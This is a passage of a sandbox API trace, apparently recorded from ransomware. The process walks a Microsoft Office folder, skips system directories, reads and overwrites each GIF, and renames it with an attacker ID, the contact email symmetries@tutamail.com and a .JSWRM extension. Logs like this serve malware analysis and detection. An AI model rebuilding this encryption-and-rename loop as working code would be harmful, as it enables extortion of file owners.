[0120.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0120.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0120.572] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae23ccd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae23ccd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae23ccd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17bb, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR45B.GIF", cAlternateFileName="")) returned 1 [0120.572] lstrcmpiW (lpString1="ZPDIR45B.GIF", lpString2=".") returned 1 [0120.572] lstrcmpiW (lpString1="ZPDIR45B.GIF", lpString2="..") returned 1 [0120.572] lstrcmpiW (lpString1="ZPDIR45B.GIF", lpString2="...") returned 1 [0120.572] lstrcmpiW (lpString1="ZPDIR45B.GIF", lpString2="windows") returned 1 [0120.572] lstrcmpiW (lpString1="ZPDIR45B.GIF", lpString2="recovery") returned 1 [0120.572] lstrcmpiW (lpString1="ZPDIR45B.GIF", lpString2="perflogs") returned 1 [0120.572] lstrcmpiW (lpString1="ZPDIR45B.GIF", lpString2="documents and settings") returned 1 [0120.572] lstrcmpiW (lpString1="ZPDIR45B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.572] lstrcmpiW (lpString1="ZPDIR45B.GIF", lpString2="system volume information") returned 1 [0120.572] lstrcmpiW (lpString1="ZPDIR45B.GIF", lpString2="msocache") returned 1 [0120.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0120.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR45B.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR45B.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR45B.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0120.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0120.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR45B.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR45B.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR45B.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0120.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0120.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0120.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0120.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR45B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir45b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.574] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=6075) returned 1 [0120.574] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17b0) returned 0x24e1d8 [0120.574] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x17b0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x17b0, lpOverlapped=0x0) returned 1 [0120.589] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.589] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x17b0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x17b0, lpOverlapped=0x0) returned 1 [0120.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.590] CloseHandle (hObject=0x314) returned 1 [0120.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0120.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0120.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0120.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0120.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0120.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0120.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.590] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR45B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir45b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR45B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir45b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0120.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0120.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0120.591] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae23ccd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae23ccd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae23ccd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16eb, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR45F.GIF", cAlternateFileName="")) returned 1 [0120.591] lstrcmpiW (lpString1="ZPDIR45F.GIF", lpString2=".") returned 1 [0120.591] lstrcmpiW (lpString1="ZPDIR45F.GIF", lpString2="..") returned 1 [0120.591] lstrcmpiW (lpString1="ZPDIR45F.GIF", lpString2="...") returned 1 [0120.591] lstrcmpiW (lpString1="ZPDIR45F.GIF", lpString2="windows") returned 1 [0120.591] lstrcmpiW (lpString1="ZPDIR45F.GIF", lpString2="recovery") returned 1 [0120.591] lstrcmpiW (lpString1="ZPDIR45F.GIF", lpString2="perflogs") returned 1 [0120.591] lstrcmpiW (lpString1="ZPDIR45F.GIF", lpString2="documents and settings") returned 1 [0120.591] lstrcmpiW (lpString1="ZPDIR45F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.591] lstrcmpiW (lpString1="ZPDIR45F.GIF", lpString2="system volume information") returned 1 [0120.591] lstrcmpiW (lpString1="ZPDIR45F.GIF", lpString2="msocache") returned 1 [0120.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0120.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR45F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR45F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR45F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0120.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0120.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR45F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR45F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR45F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0120.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0120.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0120.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0120.592] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR45F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir45f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.592] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=5867) returned 1 [0120.592] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16e0) returned 0x24e1d8 [0120.593] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x16e0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x16e0, lpOverlapped=0x0) returned 1 [0120.594] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.594] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x16e0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x16e0, lpOverlapped=0x0) returned 1 [0120.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.595] CloseHandle (hObject=0x314) returned 1 [0120.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0120.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0120.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0120.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0120.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0120.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0120.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.595] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR45F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir45f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR45F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir45f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0120.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0120.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0120.596] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae23ccd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae23ccd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae23ccd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1304, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR46B.GIF", cAlternateFileName="")) returned 1 [0120.596] lstrcmpiW (lpString1="ZPDIR46B.GIF", lpString2=".") returned 1 [0120.596] lstrcmpiW (lpString1="ZPDIR46B.GIF", lpString2="..") returned 1 [0120.596] lstrcmpiW (lpString1="ZPDIR46B.GIF", lpString2="...") returned 1 [0120.596] lstrcmpiW (lpString1="ZPDIR46B.GIF", lpString2="windows") returned 1 [0120.596] lstrcmpiW (lpString1="ZPDIR46B.GIF", lpString2="recovery") returned 1 [0120.596] lstrcmpiW (lpString1="ZPDIR46B.GIF", lpString2="perflogs") returned 1 [0120.596] lstrcmpiW (lpString1="ZPDIR46B.GIF", lpString2="documents and settings") returned 1 [0120.596] lstrcmpiW (lpString1="ZPDIR46B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.596] lstrcmpiW (lpString1="ZPDIR46B.GIF", lpString2="system volume information") returned 1 [0120.597] lstrcmpiW (lpString1="ZPDIR46B.GIF", lpString2="msocache") returned 1 [0120.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0120.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR46B.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR46B.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR46B.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0120.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0120.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR46B.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR46B.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR46B.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0120.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0120.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0120.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0120.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR46B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir46b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.597] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=4868) returned 1 [0120.598] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1300) returned 0x24e1d8 [0120.598] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1300, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1300, lpOverlapped=0x0) returned 1 [0120.600] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.600] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1300, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1300, lpOverlapped=0x0) returned 1 [0120.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.600] CloseHandle (hObject=0x314) returned 1 [0120.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0120.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0120.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0120.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0120.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0120.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0120.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0120.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0120.600] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR46B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir46b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR46B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir46b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0120.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0120.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0120.601] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae23ccd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae23ccd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae23ccd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x141c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR46F.GIF", cAlternateFileName="")) returned 1 [0120.601] lstrcmpiW (lpString1="ZPDIR46F.GIF", lpString2=".") returned 1 [0120.601] lstrcmpiW (lpString1="ZPDIR46F.GIF", lpString2="..") returned 1 [0120.601] lstrcmpiW (lpString1="ZPDIR46F.GIF", lpString2="...") returned 1 [0120.601] lstrcmpiW (lpString1="ZPDIR46F.GIF", lpString2="windows") returned 1 [0120.601] lstrcmpiW (lpString1="ZPDIR46F.GIF", lpString2="recovery") returned 1 [0120.601] lstrcmpiW (lpString1="ZPDIR46F.GIF", lpString2="perflogs") returned 1 [0120.601] lstrcmpiW (lpString1="ZPDIR46F.GIF", lpString2="documents and settings") returned 1 [0120.602] lstrcmpiW (lpString1="ZPDIR46F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.602] lstrcmpiW (lpString1="ZPDIR46F.GIF", lpString2="system volume information") returned 1 [0120.602] lstrcmpiW (lpString1="ZPDIR46F.GIF", 